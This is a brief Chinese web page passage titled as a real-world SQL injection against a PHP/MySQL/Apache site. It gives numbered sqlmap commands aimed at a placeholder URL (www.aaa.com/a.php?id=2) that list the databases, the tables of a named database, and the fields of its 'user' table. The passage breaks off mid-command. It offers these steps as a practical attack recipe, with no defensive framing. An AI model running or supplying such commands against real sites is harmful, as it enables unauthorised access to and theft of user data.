實戰:某網站的SQL注入(php+mysql+Apache)

1.列出所有數據庫 sqlmap -u 「http://www.aaa.com/a.php?id=2」 --dbs 2.列出數據庫"hailc0218"的所有表 sqlmap -u 「http://www.aaa.com/a.php?id=2」 --tables -D"hailc0218" 3.列出數據庫"hailc0218"表「user」的所有字段 sqlmap -u 「http://www.a
相關文章
相關標籤/搜索